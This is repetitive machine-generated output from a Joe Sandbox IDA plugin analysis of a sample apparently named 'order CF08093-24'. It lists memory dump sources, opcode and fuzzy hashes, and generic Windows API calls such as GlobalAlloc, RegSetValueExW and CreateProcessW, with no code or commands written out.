GlobalAlloc 833->837 840 406be4-406bf4 GlobalAlloc 834->840 841 406bdb-406bde GlobalFree 834->841 835->830 836->837 837->811 842 406b81 837->842 838->828 839->838 839->839 840->811 840->835 841->840 842->832
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
• Instruction ID: 57bf2fd90c69a3a2134d3ca1d9604f9a54cf20ddad3feead76618616929b2f58
• Opcode Fuzzy Hash: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
• Instruction Fuzzy Hash: 17A15471E04229CBDF28CFA8C8546ADBBB1FF44305F10846ED816BB281D7786A86DF45

Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
• Instruction ID: 6b1c66eb9f97b1ade68f1d395623a9ed29f1776dbc94043a645b3c6b65beda35
• Opcode Fuzzy Hash: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
• Instruction Fuzzy Hash: C5912270E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB281D778A986DF45

Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
• Instruction ID: ce41943af36f178b06a8ef9aeec7331a28cc36c4f565c07526a7a1ecbc0683f6
• Opcode Fuzzy Hash: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
• Instruction Fuzzy Hash: 8C813571E04228CFDF24CFA8C844BADBBB1FB45305F24816AD456BB281D778A986DF45

Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
• Instruction ID: 8f4657df29e0a6c4f41eae1c6e560b42ebe12933d6c33c39fa024371cffe791d
• Opcode Fuzzy Hash: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
• Instruction Fuzzy Hash: F4815771E04228DBDF24CFA8C8447ADBBB1FF44315F10816AD856BB281D7786986DF45
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
• Instruction ID: 467485e0bb60f7ca81b57cb4e762169b1f98b62e9d0b722d18e83a7fcf81438f
• Opcode Fuzzy Hash: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
• Instruction Fuzzy Hash: 04711375E04228CBDF24CFA8C844BADBBF1FB48305F15806AD856B7281D778A986DF45
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
• Instruction ID: 8594309fab6a939f8579025671b20e25c27ad2f20b93bd04310bc8f9388019e2
• Opcode Fuzzy Hash: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
• Instruction Fuzzy Hash: A6713471E04228CBDF28CF98C844BADBBB1FF45305F14806AD816BB281D778A986DF45
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
• Instruction ID: 804367245b599a5d262e6525417658d62bb0317a144133a249ff79fbb491f744
• Opcode Fuzzy Hash: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
• Instruction Fuzzy Hash: 04712571E04228CBDF28CF98C854BADBBB1FF44305F15806AD856B7281C778A986DF45
APIs
• GlobalFree.KERNEL32(00000000), ref: 00401C30
• GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
Strings
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID: Global$AllocFree
• String ID: 32079
• API String ID: 3394109436-2447952077
• Opcode ID: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
• Instruction ID: b885d26f68b874ad9ff9a305e80acb85bda866dca5011e4f065ba1a91b1516cf
• Opcode Fuzzy Hash: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
• Instruction Fuzzy Hash: 09218473904610ABD730ABA4DE85A6E72A4AB04328715053FF952B32D4C6BCE8919B5D
APIs
• lstrlenW.KERNEL32(0040B5C8,00000023,00000011,00000002), ref: 004024FA
• RegSetValueExW.ADVAPI32(?,?,?,?,0040B5C8,00000000,00000011,00000002), ref: 0040253A
• RegCloseKey.ADVAPI32(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 00402622
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID: CloseValuelstrlen
• String ID:
• API String ID: 2655323295-0
• Opcode ID: 833edd450bf946c24d3a3f94cfbbaf1e2376c793e7492529022bf014ff981997
• Instruction ID: 8b3a83999d63c16b18a9973427bcf430ab7992b94c8fe07ed2dd95b358db5eaa
• Opcode Fuzzy Hash: 833edd450bf946c24d3a3f94cfbbaf1e2376c793e7492529022bf014ff981997
• Instruction Fuzzy Hash: 1611B431D00114BEDB00AFA5DE59AAEB6B4EF44318F20443FF400B61D1C7B88E409668
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
• Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
• Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
• Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
APIs
• OleInitialize.OLE32(00000000), ref: 004056A9
  • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
• CoUninitialize.COMBASE(00000404,00000000), ref: 004056F5
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID: InitializeMessageSendUninitialize
• String ID:
• API String ID: 2896919175-0
• Opcode ID: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
• Instruction ID: b888f1dcde8397bdf9a4ac710541df7d57aeeece4d3a8f29a6716c55d94af5f1
• Opcode Fuzzy Hash: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
• Instruction Fuzzy Hash: 0AF0B4776007409BE7115B54AE05B5B77B0EB90354F85483AEF8D726F1C7764C028B5D
APIs
• ShowWindow.USER32(00000000,00000000), ref: 00401F21
• EnableWindow.USER32(00000000,00000000), ref: 00401F2C
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID: Window$EnableShow
• String ID:
• API String ID: 1136574915-0
• Opcode ID: f524000984b40da921d67aceb392e6b1a27f4445b9fdd89c88039cce022366aa
• Instruction ID: cc057469d20fee5af05168c8280afa7b014ceb16d0f4b1b408cb009327ac905f
• Opcode Fuzzy Hash: f524000984b40da921d67aceb392e6b1a27f4445b9fdd89c88039cce022366aa
• Instruction Fuzzy Hash: 7BE04876908610DFE754EBA4AE495EE73B4EF80365B10097FE001F11D1D7B94D00975D
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                            • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID:
                                                                            • API String ID: 3712363035-0
                                                                            • Opcode ID: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                                            • Instruction ID: 3e6b85693243cf5959e47e0a5ce0ecee53803ede082a99688cf67a66356fc275
                                                                            • Opcode Fuzzy Hash: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                                            • Instruction Fuzzy Hash: 3AE0BFB4A10219BFFB10AB64ED05F7B77BCF704604F418825BD10F2551D774A9148A7C
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                                                            • Instruction ID: ad827bfb45cde9ed8aa1bf7c1acfcc20c377366860c5f8f00bfddef7402fec92
                                                                            • Opcode Fuzzy Hash: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                                                            • Instruction Fuzzy Hash: 52E04F72B11114ABCB18CBA8EDD086E73B6AB54310350453FD502B36A4CA759C418B58
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                              • Part of subcall function 004068C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                                              • Part of subcall function 004068C5: wsprintfW.USER32 ref: 00406917
                                                                              • Part of subcall function 004068C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
